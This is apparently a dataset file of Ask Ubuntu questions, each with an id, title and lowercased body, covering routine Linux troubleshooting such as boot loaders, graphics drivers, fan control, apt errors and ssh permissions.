436518	when i use `` connect to server '' , how can it remember the ip address ?	i do n't want to type in the ip address every single time . can it just save them to a list or something ?
436519	boot .efi files from grub2	i 've bought a sony vaio with uefi booting and came with windows 8 preinstalled . i successfully installed ubuntu 13.10 and windows 7 ( triple-boot ) and fixed the uefi boot so grub2 is loading . i was just wondering if i can boot .efi files from grub ? related problems : i used clover efi to boot os x 10.9 ( which i installed to boot , ca n't boot it with grub2 : aicpupm kp ) and because of it i could n't boot to either windows or ubuntu . after that i installed android 4.4 x86 and added its boot entry and i got kp related to efivar ( or something like that ) , so i wanted to try gummiboot . my question is : can i boot .efi files such as gummiboot.efi and cloverx64.efi from grub2 so i can preserve it for windows and ubuntu booting ?
436520	how to add paths in ubuntu	i know that this is a very popular question with a lot of threads already about it , but unfortunately after trying some of the suggestions i did n't manage to solve my problem , so i am posting a new question about it . what i am interested in , is running a c++ program in terminal , the thing is , as i was always using eclipse to compile and run programs i am completely noob on this and also my ubuntu knowledge is limitated to very basic things . so what i am finding difficulties in is when i want to compile a program which needs to include some header files form different directories . what i want to do is to include this libraries without needing to add in the # include `` ... '' the whole path of where the library is but just it 's name . in eclipse this could be done by adding paths through options , but in ubuntu i am not really sure how to do so , following some instructions in other threads i tried to add the paths to my ~/.profile txt file but without any success . so i would like to ask how is this possible to be done , i.e . where and how to add the paths of the header files needed so that i want have all the time for very new project to provide the entire path in my includes .
436521	offline 'email ' messaging between users - ltsp	we have an ubuntu 12.04 ltsp network set up a school with about 40 users . we currently do not have internet access at the school . i 'd like for students to be able to communicate with each other using the thin clients . is there any program i can use to allow users to send/receive 'email ' or instant messages to other users , even if the intended recipients are not currently logged on ? thanks
436522	distorted , misshapen , fuzzy youtube videos	since i downloaded flash player for my ubuntu 12.4 an hour ago , the youtube music videos appear fuzzy with distorted colors , filling only half of the video . the sound quality is however good . what 's wrong with this picture ! sincerely , ezra ford
436526	my fan is not working , no active cooling system	i am using ubuntu 14.04 on my laptop and my fan is not working ( with ubuntu 12.04 and ubuntu 13.10 it was the same ) . short summary of my system quanta twh motherboard , intelâž coreâ˘ i7-2630qm cpu i follow 3 different ways to solve my problem 1 . using lm-sensors , pwmconfig and fancontrol to control the speed of my fan first , i try to see what was happening with lm-sensors , i even could not detect my fan . later on , forced with modeprobe ref1 with following command line . sudo modprobe w83627ehf-isa-fff8 it helps to get more sensors with lm-sensors-detect but they all in alarm , i believe they are set as null because i create them artificially or not ( i am not sure about what is modeprobe is doing for me ) ? here is my sudo sensors results after that process . acpitz-virtual-0 adapter : virtual device temp1 : +61.0 c ( crit = +101.0 c ) w83627ehf-isa-fff8 adapter : isa adapter vcore : +2.04 v ( min = +2.04 v , max = +2.04 v ) alarm in1 : +2.04 v ( min = +2.04 v , max = +2.04 v ) alarm avcc : +4.08 v ( min = +4.08 v , max = +4.08 v ) alarm +3.3v : +4.08 v ( min = +4.08 v , max = +4.08 v ) alarm in4 : +2.04 v ( min = +2.04 v , max = +2.04 v ) alarm in5 : +2.04 v ( min = +2.04 v , max = +2.04 v ) alarm in6 : +2.04 v ( min = +2.04 v , max = +2.04 v ) alarm 3vsb : +4.08 v ( min = +4.08 v , max = +4.08 v ) alarm vbat : +4.08 v ( min = +4.08 v , max = +4.08 v ) alarm in9 : +2.04 v ( min = +2.04 v , max = +2.04 v ) alarm fan1 : 0 rpm ( min = 0 rpm , div = 128 ) alarm fan2 : 0 rpm ( min = 0 rpm , div = 128 ) alarm fan3 : 0 rpm ( min = 0 rpm , div = 128 ) alarm temp1 : -1.0 c ( high = -1.0 c , hyst = -1.0 c ) alarm sensor = cpu diode temp2 : +0.0 c ( high = +0.0 c , hyst = +0.0 c ) alarm sensor = cpu diode temp3 : +0.0 c ( high = +0.0 c , hyst = +0.0 c ) alarm sensor = cpu diode cpu0_vid : +1.219 v intrusion0 : alarm coretemp-isa-0000 adapter : isa adapter physical id 0 : +61.0 c ( high = +86.0 c , crit = +100.0 c ) core 0 : +57.0 c ( high = +86.0 c , crit = +100.0 c ) core 1 : +61.0 c ( high = +86.0 c , crit = +100.0 c ) core 2 : +57.0 c ( high = +86.0 c , crit = +100.0 c ) core 3 : +57.0 c ( high = +86.0 c , crit = +100.0 c ) pkg-temp-0-virtual-0 adapter : virtual device temp1 : +61.0 c at that point , i try to run sudo pwmconfig . still , i am not able go further from there are no usable pwm outputs . i stack here with this way . ( my computer is not dell ) 2 . install the latest microcode for my processor i instal the following the steps given here , thanks to @ floppy for the advise . installing intel-microcode and microcode.ctl packages ( as @ floppy suggested ) are help to wake up my fan , it helps to decrease cpu temperature . fan was working quite independent from cpu temperature . it was doing some work but still not efficient at all . furthermore , sensors-detect is still not able to get my fan without that sudo modprobe w83627ehf-isa-fff8 3 . bios update okey my cpu temperature is lower , but still not enough to perform even for the basic applications . i also think about to update my bios , but i could not convince myself it might be the reason of my problem in the beginning . i have quanta twh motherbord with i7-2630qm with insyde qr133 bios . i update it with usb up-to the qr192 . bios update decreases my cpu temperatures around 10~15 celcius , i do not know how and why . i am still looking for alternative methods to control my fan , or/and force it to work at given/at the maximum rate all the time
436530	how to create more partitions od usb flash drive ?	i want to ask how to create more partitions od usb flash drive ? and if is it possible under ubuntu . will i be able to boot a live distribution from created partition ? which tool should i use , i was trying it with gparted . but with no success . thank you .
436537	custom server iso can not find kernel to install	i 'm trying to build a custom ubuntu server iso , and am hitting a weird problem i 'm hoping someone here can help with . i 'm using uck and these instructions . when i do the minimum possible to build a `` custom '' iso , it spits out an iso which installs and works without any issues . uck-remaster-unpack-iso ./ubuntu_trusty-server-amd64.iso uck-remaster-pack-iso however , i want to be able to include custom packages on my iso too . uck sets up the environment for you and then takes your gpg key and automatically signs everything for you : uck-remaster-clean uck-remaster-unpack-iso ubuntu_trusty-server-amd64.iso uck-remaster-prepare-alternate gpg -- list-keys uck-remaster-finalize-alternate 60fb276f uck-remaster-pack-iso it generates an iso without any errors , however the iso those this wonderful error : syslog shows these ( full ) : mar 19 19:37:28 base-installer : using cd-rom mount point /media/cdrom/ mar 19 19:37:28 base-installer : identifying.. mar 19 19:37:28 base-installer : [ 53fed41586d1f78a456ce051a5c87264-2 ] mar 19 19:37:28 base-installer : scanning disc for index files.. mar 19 19:37:29 base-installer : found 3 package indexes , 0 source indexes , 0 translation indexes and 1 signatures mar 19 19:37:29 base-installer : found label 'ubuntu-server 14.04 lts _trusty tahr_ - alpha amd64 ( 20140306 ) ' mar 19 19:37:29 base-installer : this disc is called : mar 19 19:37:29 base-installer : 'ubuntu-server 14.04 lts _trusty tahr_ - alpha amd64 ( 20140306 ) ' mar 19 19:37:29 base-installer : copying package lists ... mar 19 19:37:29 base-installer : gpgv : signature made fri 14 mar 2014 01:18:54 am utc using rsa key id 60fb276f mar 19 19:37:29 base-installer : gpgv : ca n't check signature : public key not found mar 19 19:37:29 base-installer : e : sub-process gpgv returned an error code ( 2 ) mar 19 19:37:29 base-installer : w : signature verification failed for : /media/cdrom/dists/trusty/release.gpg mar 19 19:37:29 base-installer : e : no cd-rom could be auto-detected or found using the default mount point . mar 19 19:37:29 base-installer : you may try the -- cdrom option to set the cd-rom mount point . see 'man apt-cdrom ' for more information about the cd-rom auto-detection and mount point . mar 19 19:37:29 base-installer : error : error while running apt-cdrom i also tried following the instructions here but it had the same result - uck seems to follow those instructions from looking at the source . any ideas or suggestions would be appreciated . updates after more investigation : breaking out to a shell after the 'bad kernel ' message : when examining the keys found in /usr/share/keyrings with gpg -- list-keys -- keyring ./ubuntu-archive-keyring.gpg the signing key injected by uck or manually through a ubuntu-keyring rebuild are not installed prior to the apt-cdrom call in the installer . as such , dists/trusty/release.gpg fails gpg verification . manually running dpkg -i on the rebuilt ubuntu-keyring package installs the replacement keys correctly ; both in /usr/share/keyrings and into the appropriate gpg envelope - however , exiting the shell , and reinstating the software installation at that point from the installation menu , does not fix the apt-cdrom gpg validation process - it looks as though gpg keys are getting injected from some other udeb , and ubuntu-keyring is not installed prior to the apt-cdrom check . unfortunately , the error message displayed , is not reflective of the underlying problem . the problem is that that apt-cdrom can not verify the gpg signature , therefore does n't recognise the cdrom as a valid package source . that means that there are no kernels available to install .
436540	using tv as monitor and display choices are either too big or too small	1280x720 is slightly too big for my tv and 1024x768 is too small for my tv , but that is the only displays listed , i need a resolution inbetween those and a way to force the resolution onto the tv . the tv is a sanyo dp26640 the answer of using xandr does not help me as i do n't know numbers to change for this to work with the resolution i need .
436541	i loaded a program in wine and i cant find it	i am running 12.04 and used wine to install rosetta stone . it loaded correctly but now i cant find it . it did not create a desktop icon and it doe not show up when i search for it or when i pull up wine and look under the applications tab . i can see it when i go under wine uninstall a program . any ideas ? i would like to create a desktop link thank you .
436545	must i defrag /home in ntsf partition ?	i have installed my /home ubuntu lts12.04 in an ntfs partition ( i need compatibility with some propietary programs in windows 7 mean while ) . the question is : must i defrag that partition ntfs where i hosting my /home or ubuntu work that partition as well as any other ext4 partition ? thanks for your answer
436546	ubuntu 12.04 boots to tty1	alrighty , i have perused the threads already in existence and am finding none of them seem to have the exact combination of variables i 've got going . i 'm working on a computer using ubuntu 12.04 . currently , it boots straight into tty1 ubuntu 12.04.4 lts [ computer name ] tty1 [ computer name ] login : password : login leads to : last login : wed mar 19 13:47:11mdt 2014 on tty1 welcome to ubuntu 12.04.4 lts ( gnu/linux 3.2.0-32generic-pae i686 the owner of the computer stated that this issue happened after a recent update , if that gives anyone a hint as to the specific location of the graphics failure . i 'm capable of booting into the gui utilizing startx , but am frankly at a loss of where to go from here . years of windows has molded me into a gui heavy kinda person , so , if possible , work off the assumption that i 've no idea what you 're talking about and break it down to the simplest of steps . thanks !
436551	set username to client	how to set username when connect from vpn to linux server ? i use of pptpd for vpn server in my server . i want to assign username or id for each client when connecting to server for identify users .
436554	how do you reset your password for thunderbird ?	i am trying to set up a thunderbird account , but it keeps telling me that my password is wrong . when i went to edit/preferences/security/passwords , i discovered my suspicions were correct . but i think i may be experiencing a problem that may be altogether different . when i put in my correct username and password , this is what comes up . i just do n't know what this means or what it was that i did wrong . thunderbird opens up , i just always get this error message .
436556	ca n't login after adding script to /etc/profile.d	i have created a little script to add bookmarks in nautilus to redirect users to network share . if i run the script manually , it works brillantly but as soon as i try to add it in /etc/profile.d , i ca n't connect to the computer . it seems that as soon as i do a loop or anything `` fancy '' like that , the script give an error . here is an example if my currently working script : # ! /bin/bash # creating gtk-bookmarks if it does n't exists if [ [ ! -f ~/.gtk-bookmarks ] ] then touch ~/.gtk-bookmarks fi # adding bookmarks if not present if ! grep -fxq `` smb : //example.com/r03c01 software : '' ~/.gtk-bookmarks then echo `` smb : //example.com/r03c01 software : '' > > ~/.gtk-bookmarks fi as soon as i had a function like this one : # # # # # function find_server_by_ip ( ) # desc : this function find the server to use for the current host ip address # parameters : none # return : echo server to use # # # # function find_server_by_ip ( ) { hostname_ip= $ ( hostname -i ) ifs= '' . '' set -- $ hostname_ip if [ [ $ 3 -eq 78 ] ] then echo `` server a '' else echo `` server b '' fi } ... login stop working . what baffles me is that running this script with *bash add_shortcut.sh* or *./add_shortcut.sh* works fine ... is it possible that we ca n't create functions , parse arrays or anything like that in a script called by /etc/profile ? and in that case , where or how can i execute a login script for all the users connecting to the computer ? oh , by the way i am running ubuntu 12.04 lts ! thanks in advance and sorry for my english ! edit : there is a pastebin of the script . i do n't add it compeletly since the script comments are in french so ... well , there it is : http : //pastebin.com/71xzabk6 .
436558	external display resolution vga output	i am using a toshiba laptop with an ati radeon graphics card . i have installed ubuntu 12.04 via wubi . i am trying to output to my external display which has a native resolution of 1280x768 , but it is being recognised as an unknown display and limited to 1024x768 . i have installed all updates and the additional drivers section in the system settings says there are no proprietary drivers available . when i use the much discussed cvt and xrandr method i get this : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1280 x 800 , maximum 8192 x 8192 vga-0 connected ( normal left inverted right x axis y axis ) 1024x768 60.0 800x600 60.3 56.2 848x480 60.0 640x480 59.9 hdmi-0 disconnected ( normal left inverted right x axis y axis ) lvds connected 1280x800+0+0 ( normal left inverted right x axis y axis ) 331mm x 207mm 1280x800 60.0*+ 1280x720 59.9 1152x768 59.8 1024x768 59.9 800x600 59.9 848x480 59.7 720x480 59.7 640x480 59.4 din disconnected ( normal left inverted right x axis y axis ) ~ $ cvt 1280 768 # 1280x768 59.87 hz ( cvt ) hsync : 47.78 khz ; pclk : 79.50 mhz modeline `` 1280x768_60.00 '' 79.50 1280 1344 1472 1664 768 771 781 798 -hsync +vsync ~ $ xrandr -- newmode `` 1280x768_60.00 '' 79.50 1280 1344 1472 1664 768 771 781 798 -hsync +vsync ~ $ xrandr screen 0 : minimum 320 x 200 , current 2304 x 800 , maximum 8192 x 8192 vga-0 connected 1024x768+1280+32 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 hdmi-0 disconnected ( normal left inverted right x axis y axis ) lvds connected primary 1280x800+0+0 ( normal left inverted right x axis y axis ) 331mm x 207mm 1280x800 60.0*+ 1280x720 59.9 1152x768 59.8 1024x768 59.9 800x600 59.9 848x480 59.7 720x480 59.7 640x480 59.4 din disconnected ( normal left inverted right x axis y axis ) 1280x768_60.00 ( 0x2da ) 79.5mhz h : width 1280 start 1344 end 1472 total 1664 skew 0 clock 47.8khz v : height 768 start 771 end 781 total 798 clock 59.9hz ~ $ xrandr -- addmode vga-0 1280x768_60.00 xrandr : can not find output `` vga-0 '' even though xrandr tells me that vga-0 is connected , if i try any commands with vga-0 it tells me that it can not find output vga-0 i am a complete n00b so please bear with me . any advice would be much appreciated .
436560	diablo 3 wo n't start after add optirun prefix	i 've been trying to run the diablo3 in the ubuntu 13.10 for a while now , sadly without a success ... my problem is , that i ca n't run it with optirun . if i just type wine `` /home/belo/.wine/drive_c/games/diablo iii/diablo iii.exe '' everything is fine , until i run the game , obviously , because it is running on the intel graphics ... when i try to run optirun wine `` /home/belo/.wine/drive_c/games/diablo iii/diablo iii.exe '' the battle.net loading appears for a short time , but it disappears right away and nothing happens after . do you have any suggestions please ? thanks a lot !
436561	how do i get my computer to boot directly to ubuntu	apologies if this is a duplicate , but i have already read several other questions and answers , first and none seem to answer my question ... i was running windows xp and installed ubuntu using the windows installer . when i turn my computer on now , the menu comes up asking me to select whether i want to boot windows or ubuntu . is it possible to just have it automatically boot ubuntu and not ask as i do n't ever want to use xp again ? edited 20/3 : after closer looking , have realised that what i 'm talking about it not the grub menu -- it 's before that -- seems like it 's windows asking me this ? does anybody know what i 'm talking about ? thanks .
436563	fixing nginx 1.4.6 dependency on old openssl version ( libssl0.9.8 ) ?	i 'm trying to enable tlsv1.1 & tlsv1.2 on my ubuntu 12.04 ec2 instance w/ nginx 1.4.6 , but this version of nginx is dependent upon libssl0.9.8 , even though the newest version of openssl is installed ( 1.0.1 ) . how can i resolve this so i can enable tlsv1.1 & tlsv1.2 ?
436571	windows 8.1 and ubuntu installation black screen	i ca n't install ubuntu on my new asus r510d laptop . i have messed with it for days . my laptop model is r510d . its an amd a10 elite quad core . it has a radeon hd 8670m 2gb card built in . its running windows 8.1 64 bit and i want to run ubuntu 64 bit along side of it . i have updated all of my video drivers and updated all of my windows drivers , i have also updated my bios to the latest version ( version 2.15.1227 ) . i have shrunk my disk to have unallocated space to install ubuntu . i made a bootable usb of ubuntu 13.10 and have set the uefi bios to fast boot = disabled , secure boot = disabled . i have selected the boot device to be the bootable usb and it loads the gnu grub version 1.99 main screen which says `` try ubuntu without installing '' `` install ubuntu '' and `` check disc for defects . '' if i try to run or install it will just go to a black screen and do nothing more . if i press cntl+alt+dlt it will go back to the gnu grub menu . i can press e and edit the grub , so i have tried to add the line nomodeset before quite splash to no avail . i have changed quite splash to no splash and i see nothing . i have put nomodeset after quite splash and even replaced quite splash with nomodeset . i went back to the bios and tried to run it in legacy mode by enabling launch csm and launch pxe oprom . this did nothing to rectify this issue either . nothing is working . does anyone have any idea of what i need to do to install ubuntu ? p.s . i thought the usb could be the issue so i downloaded the disk image again , even tried downloading 12.04 and it still hangs on the black screen . so if you 're thinking my files or disk is corrupt , thats not it either .
436574	capture hrtimer interrupts with linux kernel module .. possible ?	i would like to be able to 'capture ' an hrtimer interrupt with a linux kernel module and replay the interrupt at a later period in time . any thoughts on how to go about doing this ? use case : a program that calls sleep ( 1 ) . my module will grab the hrtimer interrupt when it fires after 1 second , wait for 'x ' amount of time , then re-fire the interrupt , waking the process . note : i do not want to hook the sleep system call . thanks !
436577	how to fix error while sudo apt-get upgrade	i am getting following error on ubuntu 12.04 server . everything on this machine was installed using apt-get install and tried to keep it updated as much as possible . after last update i noticed i can no longer update my machine . this is a critical machine and i am not sure if -f will break anything else . should i use -f ? reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : mysql-server-5.5 : depends : mysql-server-core-5.5 ( = 5.5.35-0ubuntu0.12.04.1 ) but 5.5.35-0ubuntu0.12.04.2 is installed e : unmet dependencies . try using -f .
436580	install ubuntu on new computer build	i am going to build a new computer and do n't want to install/buy windows as the os . i 'd like to install the latest version of ubuntu . is this possible or will still need to have a copy of windows ? and if it 's possible do i just follow the ubuntu installation guide as normal ?
436587	inverse search with latextools and sublime text 2	i 'm trying to install latextools -- compiling works fine , but inverse search from evince does not work . is there any idea what to do ? edit : i 'm adding some clarifications per request inverse search : clicking on a spot in the pdf brings me back to the corresponding latex code . this is accomplished by latextools , a plug-in for sublime text 2 . ( it specifically claims to support evince ) . i read the readme but the section regarding linux does not solve my problem ( it works fine on my windows box with sumatrapdf )
436590	lost all my applets last time i upgraded ( to 13.10 ) . how can i get them back ?	i upgraded my system to 13.10 from 13.04 and lost all the applets in the normal view of my desktop ( i see that they are active when clicking on the workspace switcher , see this image : i remember that when i did that last time , upgrading from 12.04 to 13.04 , i could not see my applets when i briefly started x in 12.10 . i thought , no matter , i 'll upgrade to 13.04 first and then look for a fix if necessary . it was not necessary , the applets were back in 13.04 . however , this time there is no upgrading to 14.04 yet and i was wondering if someone knew what package would need to be reinstalled to fix the problem . i am thinking that just by reinstalling something it will help . there are two reasons for that : ( 1 ) it worked for me from 12.10 to 13.04 , and ( 2 ) i got such a response from the ubuntu forum . however , what was proposed so far has not worked . what i 'm wondering , also , is whether there could be logs about the problem and if so , where those logs are ? could it be related to the theme i 'm using ?
436592	sketchup was unable to initialize opengl	i have installed sketchup on my computer with with winetricks , however this time i get the following error message when i start sketchup ( after the intro window ) : i googled the error and found out that to solve , as winehq puts it : '' if you get the error `` sketchup was unable to initialize opengl ! `` , run regedit , open hkey_current_user\software\google\sketchup6\glconfig\display , and change hw_ok to 1. `` however this does n't work because what i get is this when i open regedit as you can see , i can not apply any changes because there is n't even a google folder to open ! it is not a hardware error because i have installed sketchup before on this computer with the same operating system ( i had to reinstall ubuntu ) and i did n't have that many issues . i have tried installing sketchup from the main website as i had done previously but it is not working now . thank you .
436594	everytime i start ubuntu or change sound settings my volume is put to 100 %	problem every time i 've logged into my ubuntu desktop the volume is set to 100 % . except it does n't state it 's at % 100 in the icon , and when i do change the volume it suddenly remembers the setting it used to be at and works fine . i have no idea why it 's doing this . the problem also occurs if i switch outputs or touch anything in the alsa sound settings gui . for example i 'll switch from 5.1 to stereo . poof volumes at 100 % but does n't show it 's at 100 % . i 've blown my ears out a few times now . possible cause the only thing i could think that 's causing the issue is the fact that i have two sound cards : one is the dac that i use for my audio ( speakers and headphones ) , and the other is the onboard audio that i do n't use at all . also ubuntu/linux differentiates 4 sound cards on my system ( hdmi , onboard , dac analog , dac digital ) . these are my sound settings . possible cause i would like to try to disable/unistall everything but the dac card ( so leaving the digital and analog ) to see if this fixes my issue , how should i go about doing so ? i 've also tried disabling the other cards in pulse audio but the settings never stick . my rig motherboard msi fm2-a75ma-e35 externall sound card creative studios sound blaster x-fi 5.1 surround sound pro os ubuntu 12.04 lts ca n't think of anything else pertinent . i 'm trying to avoid using onboard audio ( i mean i purchased a dac for a reason right ? as well as my cables are screwed down ) , so any advice is welcome .
436597	i have forgotten my ubuntu one password	i have forgotten my ubuntu one password . how can i reset my ubuntu one password , without knowing the original password ? or do i need to start a new account ?
436600	nvidia drivers not working with more recent ubuntu releases	i have a late 2012/early 2013 imac with the following graphics card ( lspci ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 640m mac edition ] ( rev a1 ) i have tried the latest ubuntu releases ( and even debian jessie ) - kernels 3 . { 10 , 11 , 12 , 13 } - but when i use the nvidia drivers , the screen goes completely dead and i have to power cycle . when i reboot into a headless console , the log files contain the error evo push buffer channel allocation failed i have been able to get the card to work using the nvidia 304 version of drivers and going back to ubuntu raring ( with kernel 3.8.0 ) but only if i add the following to the devices section of my /etc/x11/xorg.conf where i declare the nvidia driver . option `` usedplib '' `` off '' i 'd really like to be moving onto saucy / trusty ( when its released ) with a working nvidia driver ... but how do i get past this apparent kernel incompatibility ? i really do n't want to be stuck with a non-lts going forward . there is a somewhat related thread on nvidia devtalk but it 's not going anywhere , although i have been told that nvidia have assigned internal bug number 1483494 : - ( update : driver version 313-updates on raring also works , which i believe is the most recent driver on that distro .
436601	using ubuntu precise with dual monitors	i want to use dual monitors on a single ubuntu 12.4 pc the trick is that i want to show different things on each for example i want on the first screen workspace 1 with chrome browser and the 2nd workspace vlc ( not necessary in full screen ) . if possible , how can i do it ?
436602	iotop shows 99.8 % io load on `` -- render '' and `` -- extension '' and `` dropbox \fataldb '' processes	folks . system works more or less fine , but stucks from time to time . i 've tried to detect using iotop it and it seems that disk io is the bottleneck . chrome and jbd2 keep writing to disk all the time , but load not more than 5-15 % of io from time to time ( more than once an hour ) processes with names like -- render-print-preview .. or -- extension .. or dropbox \fataldb or chrome -- no-startup-window load > 99 % of io for a few seconds and during that time system is totally unresponsive - it just stucks so hard that i ca n't even open console and tty1 ( ctr-alt-1 ) . any ideas of why it can behave like this ? thanks . update : it seem that those 99 % load is 3-5mb/s that seems quite little . however , tests like hdpram and dd -if=/dev/sda -of=/dev/null show read speed at about 70mb/s - and that 's normal . may be the thing is that they are sequential .
436603	is it possible to connect to login screen on console session via vnc or rdp ?	following the instructions from use xrdp to connect to desktop session , i 've set up xrdp/vino so that if i 'm logged on at the console , i can remote in and share the desktop . however , my question is if it 's possible to set up vnc server to share the console 's login screen , allowing me to log in at the console remotely . i 'm not talking about the vnc/rdp login screen , which is different than the console 's login screen . the console session is usually logged in , but in the event i have to reboot remotely , i would like to log back into the console session so when i return home , the session will be accessible on the physical machine . any help would be appreciated !
436605	swap area partition	i created a swap area with gparted successfully.how can know if swap area is created ? i created the swap area after the ubuntu installation . when i write swapon -s command to terminal there appears one table but it is empty . the `` filename option '' , `` size option '' are all empty . why ?
436609	empathy does n't show the message , only `` minus '' signal	i 'm using empathy on my ubuntu ( 13.10 ) and sometimes when i receive the first message , it open the windows , but does n't show any message , only the `` -1 not readed '' . any idea what that means ?
436610	intellij unable to fetch from git	i 've cloned an existing git repository . git is working fine when i pull using command line . however , when i try doing the same from intellij , it says fetch failed . fatal : could not read from remote repository . vcs console log shows : git fetch -- progress -- prune origin java.lang.runtimeexception : invocation failed server returned invalid response . at org.jetbrains.git4idea.ssh.gitsshxmlrpcclient.askpassword ( gitsshxmlrpcclient.java:176 ) at org.jetbrains.git4idea.ssh.sshmain.authenticate ( sshmain.java:265 ) at org.jetbrains.git4idea.ssh.sshmain.start ( sshmain.java:157 ) at org.jetbrains.git4idea.ssh.sshmain.main ( sshmain.java:137 ) caused by : java.io.ioexception : server returned invalid response . at org.apache.xmlrpc.litexmlrpctransport.sendrequest ( litexmlrpctransport.java:243 ) at org.apache.xmlrpc.litexmlrpctransport.sendxmlrpc ( litexmlrpctransport.java:90 ) at org.apache.xmlrpc.xmlrpcclientworker.execute ( xmlrpcclientworker.java:72 ) at org.apache.xmlrpc.xmlrpcclient.execute ( xmlrpcclient.java:194 ) at org.apache.xmlrpc.xmlrpcclient.execute ( xmlrpcclient.java:185 ) at org.apache.xmlrpc.xmlrpcclient.execute ( xmlrpcclient.java:178 ) at org.jetbrains.git4idea.ssh.gitsshxmlrpcclient.askpassword ( gitsshxmlrpcclient.java:170 ) ... 3 more fatal : could not read from remote repository . please make sure you have the correct access rights and the repository exists . i 'm using ssh key pair for authentication . i 'd appreciate any help on this .
436612	how to widen `` window list item '' boxes in ( cinnamon ) gnome desktop to fit ?	i was able to increase the size of gnome panels that hold the window list item boxes by modifying the `` width '' property of the `` .window-list-item-box '' css class of cinnamon.css ( in the cinnamon desktop ) , but now the label width has not expanded to fit this . i tried tweaking the width and paddings of the same class and the window-list-item-label class to no avail ... anyone have any suggestions ? see the picture below for more details . .window-list-item-box { color : rgba ( 255,255,255,1.0 ) ; background-gradient-direction : vertical ; background-gradient-start : rgba ( 100,100,100,0.5 ) ; background-gradient-end : rgba ( 50,50,50,0.5 ) ; box-shadow : inset 0px 0px 0px 1px rgba ( 80,80,80,0.5 ) ; border-radius : 4px 4px 0px 0px ; padding : 1px ; padding-left : 5px ; padding-right : 5px ; transition-duration : 100 ; width : 400px ; }
436613	how to rollback an `` apt-get install dist-upgrade '' ?	in order to get up-to-date with some kernel libraries , i tried to upgrade my ubuntu 13.10 using sudo apt-get install dist-upgrade . however , after upgrading it the results were not satisfactory at all and , as a matter of fact , i am experiencing some performance issues now and slow bootingâś i browsed several forums and solutions in order to rollback my system as it was before upgrade . however i did n't find an official solution so far , such as apt-get rollback ... sort of . the most reasonable ( and smart ) solution i have found it was look up at the /var/log/apt/history.log and browse the content for the latest upgrade to find the previous libraries versions and manually reinstalling each one of them ( and removing the new ones prior ) . there is a reasonable solution that helped me out to figure this workaround . however , i was wondering if maybe someone has knowledge about any official tool to perform such rollback operation . does anyone has any ideas to rollback an upgraded system ? i would really appreciate any efforts , thanks in advance !
436615	how to uninstall popcorn-time installed with a script ?	i 've installed popcorn time using the following command : cd wget https : //raw.github.com/hotice/webupd8/master/popcorn-build chmod +x popcorn-build ./popcorn-build that i found here . how can i uninstall it ?
436616	permissions on .ssh folder ?	i am trying to run a script that does a ssh connection as user 'nobody ' ( that is my apache user ) . since when doing a ssh connection , the file ~/.ssh/known_hosts needs to be written , i am getting an error , because that user does not have permissions to write in ~/.ssh that is because ~/.ssh is owned by another user . my question is : what is the correct approach on doing something like this ? should i change the permissions on ~/.ssh so that my apache user can access it ? edit : 1 - i want to be able to connect to a remote machine using ssh being the user 'nobody ' in my machine . 2 - i am running the script as 'nobody ' user because it 's a php script that is run from my web server , and nobody is my apache user . 3 - the error that i see is that it says it has no ability to write in /.ssh - i believe is trying to write the known_hosts file , but it does not have permission to do so .
436620	what is the apt-get equivalent of this command ?	what is the apt-get equivalent of the following command ? aptitude -r install linux-headers- $ ( uname -r|sed 's , [ ^- ] *- [ ^- ] *- , , ' ) < package name > thanks .
436625	how to reset ubuntu 12.04 root permissions ?	i run this command `` sudo chmod -r 777 / '' by mistake . after restart , the os became very wired , no internet access , many things does n't work , ca n't open any software ... is there any possible way to reset that ! or undo this command ? !
436626	cpu frequency not changing in ubuntu 13.10 thinkpad t440	i 'm using a thinkpad t440 with ubuntu 13.10 , and turboboost does n't seem to be working . the processors almost always remain at the minimum , 0.8ghz . here is the output of turbostat : cor cpu % c0 ghz tsc smi % c1 % c3 % c6 % c7 ctmp ptmp % pc2 % pc3 % pc6 % pc7 % pc8 % pc9 % pc10 pkg_w cor_w gfx_w 99.96 0.80 2.49 0 0.04 0.00 0.00 0.00 49 50 0.00 0.00 0.00 0.00 0.00 0.00 0.00 4.52 1.68 0.02 0 0 99.99 0.80 2.49 0 0.01 0.00 0.00 0.00 49 50 0.00 0.00 0.00 0.00 0.00 0.00 0.00 4.52 1.68 0.02 0 1 99.99 0.80 2.49 0 0.01 1 2 99.87 0.80 2.49 0 0.13 0.00 0.00 0.00 47 1 3 99.99 0.80 2.49 0 0.01 during this , i 'm running 4 busy loops so htop reports every core to be running at 100 % . my processor : intel® core™ i5-4300u cpu @ 1.90ghz × 4 anyone have any guesses why the cpu frequency does n't update ?
436627	net surf error with xfce	how do i fix the way net surf shows stuff , for example , when i type something in and search it most of the words are overlapping together and are impossible to read . and some words just have random symbols covering them so i can never read what i want to .
436628	installing all packages in a ppa	how do i download all of the packages contained within a particular ppa in one command , without explicitly listing out each package ? for example , say i want to download all 108 or so packages contained within the backbox ppa without having to type out each package like this : sudo apt-get install package1 , package2 , package3 , package4 , package5 how would i go about doing this ?
436629	how do sensors-indicator colors work ?	i have been using lm-sensors for a while now , and decided to try sensors-indicator not to enter the command manually on terminal each time i want to take a quick look at my laptop 's temperature . my cpu temperature is usually around 50s°c and 60s°c , and the icon in the gnome shell turns to red as soon as it goes above 52°c ( which i think is a perfectly normal working temperature ) . i do n't understand why this is the case , since the cpu 's crit_temp value is +105.0°c and high_temp +87.0°c . this is not the case with the acpi and the gpu , which show in green at above 60°c and whose crit_temp are not significantly higher , namely +110.0°c . here is my output of sensors in terminal : ~ $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +62.0°c ( crit = +110.0°c ) radeon-pci-0100 adapter : pci adapter temp1 : +52.0°c coretemp-isa-0000 adapter : isa adapter physical id 0 : +61.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +59.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +61.0°c ( high = +87.0°c , crit = +105.0°c ) core 2 : +58.0°c ( high = +87.0°c , crit = +105.0°c ) core 3 : +59.0°c ( high = +87.0°c , crit = +105.0°c ) so how do sensor-indicator colors work ? why does it show these cpu temperatures as high , i.e . in red ? is it because the cpu output has a high_temp value and uses it as a referent instead of the crit_temp ? if so , is there any way of removing those values ?
